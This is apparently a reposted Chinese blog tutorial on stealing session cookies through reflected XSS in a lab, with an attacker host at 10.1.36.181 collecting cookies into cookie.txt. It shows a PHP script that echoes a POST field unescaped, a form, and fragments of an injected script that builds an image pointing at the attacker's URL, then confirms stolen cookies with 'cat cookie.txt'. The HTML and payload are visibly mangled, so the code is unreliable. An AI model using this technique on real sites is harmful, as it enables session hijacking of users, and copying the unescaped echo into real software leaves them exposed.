攻击机器  10.1.36.181 stealcookies.php cookie.txt

受害服务器 10.1.36.34 victim.php victim.html

(1)受害者有xss漏洞的脚本victim.php (问题字段用红色标明)

php
session_start();

session_regenerate_id();
echo session_id()."
"
;

if(isset($_POST["login"]))
{
echo "Hello ".$_POST["name"]."
"
;
}
?>

(2)对应表单victim.html



id="form1"name="form1"method="post"action="victim.php">
Name
name="name"type="text"id="name"/>

name="login"type="submit"id="login"value="submit"/>')</script>

js的意思是生成一个包含攻击者url的图片

简单的利用xss盗取cookie实例 - 碳基体 - 碳基体

接着我们可以看到访问该页面用户的cookie写入到了攻击者的cookie.txt文件里

查看攻击者10.1.36.181上的cookie.txt文件

cat cookie.txt

可以看到收到cookie了